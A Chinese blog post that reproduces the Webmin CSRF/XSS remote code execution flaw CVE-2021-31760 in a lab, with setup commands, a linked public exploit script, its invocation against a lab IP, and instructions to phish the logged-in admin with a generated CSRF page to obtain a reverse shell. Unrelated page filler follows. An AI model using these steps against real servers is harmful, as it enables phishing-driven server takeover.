webmin 代码执行 (CVE-2021-31760)


所有文章,仅供安全研究与学习之用,后果自负!

webmin 代码执行 (CVE-2021-31760)

0x01 漏洞描述

描述: Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。

远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。

poc利用前提
默认账号为ubuntu账号密码。
1.需要root账户登录Webmin
2.需要进入/etc/webmin/confing,将referers_none=1修改为

0x02 影响范围

Webmin<=1.9734

0x03 漏洞复现

搭建靶场

环境搭建:
ubuntu 192.168.157.129 存在webmin漏洞的服务器
kali 192.168.157.137 攻击机
win10 192.168.157.1 webmin登录管理员(root登录, 点开恶意xss链接)

1.下载webmin
wget http://prdownloads.sourceforge.net/webadmin/webmin_1.973_all.deb
2.安装依赖
apt-get install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl apt-show-versions python unzip
3.安装Webmin
dpkg -i webmin_1.973_all.deb
安装完成后访问
https://192.168.157.129:10000

(1)win10 管理员 访问靶场
账号密码默认为 ubuntu 登录账号密码

root 123456
在这里插入图片描述
后台界面如下
在这里插入图片描述

(2) kali攻击
poc下载

https://github.com/electronicbots/CVE-2021-31760

执行脚本

python3 RCE_eXploit.py 
https://192.168.157.129:10000 
192.168.157.137
8888 
1
#挨个输入后
#脚本自动启动监听 192.168.157.137:8888端口 
#并且在脚本目录生成一个csrf_poc.html

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
想办法 生成的html 发送给 win10 管理员 让其在登录状态下点开
(3) win10管理员中了钓鱼点开后
自动访问到

https://192.168.157.129:10000/proc/run.cgi

在这里插入图片描述
在kali机上发现 来自 webmin服务器的 shell反弹回来啦

在这里插入图片描述

0x04 漏洞修复

升级至最新版本

参考

https://blog.csdn.net/weixin_45006525/article/details/116259694
https://blog.csdn.net/Cypher_X/article/details/117196940
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-36554是一个安全漏洞,根据提供的引用内容,我没有找到与该漏洞相关的具体信息。请提供更多关于CVE-2022-36554的细节,以便我能够为您提供更准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CVE-2022-36446 Webmin命令注入漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126345900)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CVE-2022-34265 &CVE-2019-14234 sql注入](https://blog.csdn.net/weixin_53090346/article/details/125760708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值